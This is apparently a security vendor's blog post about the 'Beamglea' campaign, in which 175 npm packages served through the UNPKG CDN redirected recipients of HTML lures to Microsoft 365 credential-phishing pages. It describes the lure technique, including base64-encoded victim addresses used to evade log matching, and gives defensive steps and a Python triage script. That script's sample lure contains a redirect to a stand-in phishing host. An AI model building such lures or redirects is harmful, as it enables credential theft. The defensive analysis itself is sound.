
Massive npm Phishing Operation Leverages 175 Malicious Packages to Target Global Enterprises

Updated: 4 days ago

A sweeping phishing operation has been uncovered in which attackers published 175 malicious npm packages, downloaded over 26,000 times in total, and used them as covert infrastructure for credential harvesting against more than 135 organizations in the technology, energy, and industrial sectors. The campaign, dubbed "Beamglea," illustrates a worrying trend: attackers abusing trusted software supply chains, and the CDNs that mirror them, to scale up phishing.


Key Takeaways

  • 175 malicious npm packages identified, with over 26,000 downloads.

  • Campaign targeted over 135 companies in tech, industrial, and energy sectors.

  • Attackers leveraged npm and the UNPKG CDN as free, trusted infrastructure for redirects to phishing pages.

  • No malicious code executed on installation; phishing occurred through specially crafted HTML files distributed to victims.

How The Attack Worked

Security researchers found that the attackers used automated Python-based tooling to generate and publish npm packages with random-looking names, so accidental installation by developers was unlikely and was never the goal. Once published to the public npm registry, each package became retrievable through UNPKG, a content delivery network that serves the files of any npm package by URL without any further action on the attacker's part.

The core strategy did not involve running malicious code during package installation. Instead, the attackers sent victims convincing HTML files posing as business documents such as purchase orders or technical specifications, most likely as email attachments. When a recipient opened one, a script tag in the file loaded JavaScript from UNPKG, and that script redirected the browser to a phishing page built to harvest credentials. The victim's email address travelled in the redirect URL and was used to prefill the login form, which makes the page look legitimate and raises the chance that the credentials are entered.

Targets And Technical Details

The campaign primarily targeted organizations in Western Europe, focusing on Germany, the Netherlands, Belgium, and Italy. Key industries affected included:

  • Industrial manufacturing (35% of identified victims)

  • Technology and electronics (20%)

  • Energy and chemicals (15%)

The attackers registered at least seven phishing domains for the campaign and base64-encoded parameters such as the victim's email address in the redirect URLs, which defeats naive pattern matching on addresses in proxy and gateway logs. Many of the landing pages mimicked Microsoft login portals to harvest Microsoft 365 (Office 365) credentials; accounts without multi-factor authentication were the most exposed, since a stolen password alone is enough to sign in.

Defensive Measures And Recommendations

Security experts recommend the following actions:

  1. Force password resets for any potentially compromised accounts.

  2. Enable multi-factor authentication (MFA) across all corporate and cloud systems.

  3. Review email gateway logs for suspicious HTML file attachments sent during the campaign period.

  4. Monitor proxy and DNS logs for requests to unpkg.com paths that match the package names identified in the campaign, and for the flagged phishing domains.

  5. Quarantine or block standalone HTML attachments delivered via email.
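The lure described in "How The Attack Worked", the base64-encoded parameters noted under "Targets And Technical Details", and steps 3 to 5 above all come down to one triage question for an incident responder: what does a given HTML attachment load, and where would it send the browser? The script below is an added example, not tooling from the campaign, the article, or any vendor. It parses an HTML file, records every external and inline script, flags scripts served from unpkg.com and recovers the npm package name (to compare with a blocklist), extracts the URLs the page would contact, and tries to recover a victim address hidden as a literal or base64-encoded query value or URL fragment. The sample HTML, the package name random-pkg-x9k2q, the host phish.example and the address alice@example.com are constructed for this example. One caveat: in the real lure the redirect logic lived in the CDN-served file rather than in the attachment, so a production tool would also fetch and scan that file; the sample here puts the redirect inline so the example runs offline.

```python
"""Triage helper for standalone HTML attachments (added example, not from the campaign
or the article). Package name, host, address and the HTML sample are constructed."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

UNPKG_HOSTS = {"unpkg.com", "www.unpkg.com"}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class _ScriptCollector(HTMLParser):
    """Gathers external script URLs (src attributes) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def unpkg_package(url):
    """Return the npm package name if url is served by unpkg.com, else None.

    unpkg paths look like /name@version/file or /@scope/name@version/file.
    """
    parts = urlsplit(url)
    if parts.netloc.lower() not in UNPKG_HOSTS:
        return None
    segments = parts.path.lstrip("/").split("/")
    spec = "/".join(segments[:2]) if segments[0].startswith("@") else segments[0]
    at = spec.rfind("@")
    name = spec[:at] if at > 0 else spec  # drop "@version", keep a leading scope "@"
    return name or None


def embedded_email(url):
    """Return an email found in url's query values or fragment, literal or base64-encoded."""
    parts = urlsplit(url)
    # Split by hand: parse_qs would turn '+' into a space and break base64 values.
    values = [kv.split("=", 1)[1] for kv in parts.query.split("&") if "=" in kv]
    if parts.fragment:
        values.append(parts.fragment)
    for raw in values:
        value = unquote(raw)
        if EMAIL_RE.match(value):
            return value
        try:
            padded = value + "=" * (-len(value) % 4)  # restore stripped padding
            decoded = base64.urlsafe_b64decode(padded).decode("utf-8")  # both alphabets
        except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
            continue
        if EMAIL_RE.match(decoded):
            return decoded
    return None


def triage_html(html):
    """Summarise what an HTML attachment loads and where it would send the browser."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    urls = set()
    for blob in collector.srcs + collector.inline:
        urls.update(URL_RE.findall(blob))
    packages = sorted({pkg for src in collector.srcs if (pkg := unpkg_package(src))})
    hosts = sorted({urlsplit(u).netloc.lower() for u in urls} - UNPKG_HOSTS)
    emails = sorted({e for u in urls if (e := embedded_email(u))})
    return {
        "unpkg_packages": packages,  # names to compare against a registry blocklist
        "redirect_hosts": hosts,     # non-CDN hosts the page would contact
        "embedded_emails": emails,   # recovered victim identities
        "suspicious": bool(packages) or bool(emails),
    }


# Constructed sample lure. The script src points at a hypothetical package on unpkg;
# the redirect is placed inline here (in the real lure it sat in the CDN-served file).
SAMPLE_LURE = """<html><head><title>Purchase Order</title>
<script src="https://unpkg.com/random-pkg-x9k2q@1.0.0/dist/index.js"></script>
</head><body><p>Loading document...</p>
<script>
  window.location.href = "https://phish.example/login?u=YWxpY2VAZXhhbXBsZS5jb20=";
</script></body></html>"""

BENIGN_HTML = "<html><body><p>Quarterly report</p></body></html>"  # constructed control

if __name__ == "__main__":
    print(triage_html(SAMPLE_LURE))
```

Run it over quarantined attachments from the campaign window; the high-signal indicator is an HTML "document" that loads any script from unpkg.com at all, and the recovered address tells you which mailbox to reset and which user to contact.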

Treat public package registries and the CDNs that mirror them as untrusted content sources: a script URL on a well-known domain says nothing about who published the package behind it, and detection rules for email and web traffic should reflect that. As attackers continue to co-opt legitimate infrastructure, organizations must keep monitoring continuously and adjust their defences as tactics change.

The Broader Supply Chain Risk

The Beamglea campaign underscores how package ecosystems like npm can be turned into unwitting infrastructure for social engineering. Although the packages carried no install-time malicious code, using them to host phishing redirects behind a reputable CDN domain sets a worrying precedent for future campaigns.

Staying ahead of such evolving tactics requires proactive defense strategies, improved awareness, and ongoing collaboration between software suppliers, security professionals, and the wider development community.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

  • 175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign, The Hacker News.

  • Global Cyberattacks Using 175 Malicious npm Packages and 26,000 Downloads Against Technology and Energy Companies, Cyber Press.

  • 175 Malicious npm Packages Targeting Tech and Energy Firms, 26,000 Downloads, GBHackers News.
